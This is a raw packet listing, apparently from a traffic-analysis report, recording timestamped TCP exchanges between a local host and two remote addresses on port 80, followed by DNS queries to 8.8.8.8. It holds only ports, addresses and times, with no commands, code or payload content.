Oct 29, 2021 20:51:20.445346117 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445358992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445384026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445405006 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445409060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445435047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445453882 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445460081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445486069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445496082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445512056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445548058 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445560932 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445585966 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445610046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445626974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445635080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445662022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445671082 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445811987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445847988 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445867062 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445890903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445915937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445928097 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.445940971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445966959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.445985079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.652928114 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.027656078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.152966022 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.323157072 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.356647015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.356683016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.356810093 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.356861115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.356885910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.356906891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.356930017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.356954098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.356980085 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.357094049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357115984 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357139111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357160091 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357170105 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.357198000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.357682943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357706070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357728004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357748985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357770920 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.357800961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.357966900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.357989073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358010054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358030081 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358031988 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358069897 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358128071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358150959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358174086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358194113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358206987 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358247042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358392954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358416080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358438015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358458042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358462095 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358501911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358612061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358647108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358668089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358690023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358690023 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358726978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358771086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358793974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358814955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358835936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.358839035 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.358880043 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359030008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359046936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359066963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359088898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359096050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359111071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359132051 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359138966 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359153986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359178066 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359201908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359222889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359242916 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359244108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359286070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359348059 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359369993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359390974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359410048 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359414101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359452009 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359605074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359627008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359647989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359667063 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359669924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359755993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359762907 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359777927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359800100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359817028 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.359819889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.359858036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360049009 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360071898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360091925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360112906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360112906 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360152960 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360171080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360193014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360214949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360234976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360235929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360272884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360352993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360378027 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360411882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360428095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360452890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360471964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360481024 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360490084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360508919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360527039 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360569954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360610008 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360707998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360726118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360740900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360774994 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360857964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360878944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360894918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360903978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360913992 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360930920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.360943079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.360980988 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.361232996 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.361252069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.361269951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.361288071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.361304045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.361330986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.361340046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.433779955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.433821917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.433837891 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.433856964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.433928967 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.433955908 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.433962107 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.433979988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.433998108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434014082 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434015989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434031963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434062958 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434082985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434101105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434117079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434133053 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434137106 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434151888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434160948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434174061 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434196949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434197903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434223890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434290886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434308052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434334993 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434336901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434356928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434381962 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434515953 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434536934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434555054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434571981 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434571981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434604883 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434710979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434729099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434746027 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434758902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434775114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434783936 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434829950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434861898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434880018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434880018 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434897900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434925079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434938908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434954882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434974909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.434982061 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.434992075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.435010910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.435024977 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.435026884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.435045004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.435055971 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.435060978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.435077906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.435091019 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.435122013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.435131073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436258078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436276913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436295033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436311007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436340094 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.436367989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436376095 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.436386108 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436418056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.436428070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.436454058 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:21.436638117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:21.653011084 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:52:00.913629055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:52:00.913788080 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:52:25.515888929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:52:25.516076088 CEST	49865	80	192.168.2.4	91.219.236.97

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 29, 2021 20:49:29.888782978 CEST	58028	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:29.908396959 CEST	53	58028	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:29.928281069 CEST	53097	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:29.948579073 CEST	53	53097	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:30.107043028 CEST	49257	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:30.453305006 CEST	53	49257	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:30.607532978 CEST	62389	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:30.627023935 CEST	53	62389	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:33.139940023 CEST	64549	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:33.157532930 CEST	53	64549	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:33.305393934 CEST	63153	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:33.324784994 CEST	53	63153	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:49.902232885 CEST	52991	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:49.919909000 CEST	53	52991	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:50.074770927 CEST	51726	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:50.427860975 CEST	53	51726	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:50.615381002 CEST	56794	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:50.634933949 CEST	53	56794	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:50.785295963 CEST	56534	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:50.804724932 CEST	53	56534	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:50.947933912 CEST	56627	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:50.965550900 CEST	53	56627	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:53.345283031 CEST	61721	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:53.364914894 CEST	53	61721	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:53.514359951 CEST	61522	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:53.533778906 CEST	53	61522	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:53.678652048 CEST	52337	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:53.697316885 CEST	53	52337	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:53.845880985 CEST	55046	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:53.865500927 CEST	53	55046	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:56.904731989 CEST	60875	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:56.925883055 CEST	53	60875	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:56.978686094 CEST	56448	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:56.997981071 CEST	53	56448	8.8.8.8	192.168.2.4
Oct 29, 2021 20:49:57.716651917 CEST	59172	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:49:57.734257936 CEST	53	59172	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:01.259711027 CEST	60579	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:01.278903961 CEST	53	60579	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:01.427443027 CEST	61531	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:01.446866989 CEST	53	61531	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:01.593899965 CEST	49228	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:01.881928921 CEST	53	49228	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:02.898878098 CEST	59794	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:02.918227911 CEST	53	59794	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:04.238812923 CEST	55916	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:04.258160114 CEST	53	55916	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:04.432089090 CEST	52752	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:04.451560020 CEST	53	52752	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:04.600076914 CEST	60542	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:04.619395018 CEST	53	60542	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:04.762348890 CEST	60689	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:04.779773951 CEST	53	60689	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:04.920945883 CEST	64206	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:04.940284014 CEST	53	64206	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:06.707464933 CEST	50904	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:06.727159023 CEST	53	50904	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:06.889554024 CEST	57525	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:06.908982992 CEST	53	57525	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:07.063785076 CEST	53814	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:07.083571911 CEST	53	53814	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:07.242934942 CEST	53418	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:07.262455940 CEST	53	53418	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:07.409239054 CEST	62833	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:07.428622007 CEST	53	62833	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:10.076935053 CEST	49944	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:10.097321033 CEST	53	49944	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:10.412354946 CEST	63300	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:10.432265043 CEST	53	63300	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:10.578986883 CEST	61449	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:10.597907066 CEST	53	61449	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:12.557410955 CEST	51275	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:12.578183889 CEST	53	51275	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:13.764990091 CEST	63492	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:13.784146070 CEST	53	63492	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:14.022073030 CEST	58945	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:14.041105032 CEST	53	58945	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:14.229825974 CEST	60779	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:14.249653101 CEST	53	60779	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:14.480586052 CEST	64014	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:14.500092983 CEST	53	64014	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:14.733717918 CEST	57091	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:14.751549006 CEST	53	57091	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:15.424772978 CEST	55904	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:15.444143057 CEST	53	55904	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:15.703027010 CEST	52109	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:15.722356081 CEST	53	52109	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:16.362261057 CEST	54450	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:16.381613016 CEST	53	54450	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:16.818459988 CEST	49374	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:16.838211060 CEST	53	49374	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:18.243271112 CEST	50436	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:18.262778997 CEST	53	50436	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:18.442924976 CEST	62605	53	192.168.2.4	8.8.8.8
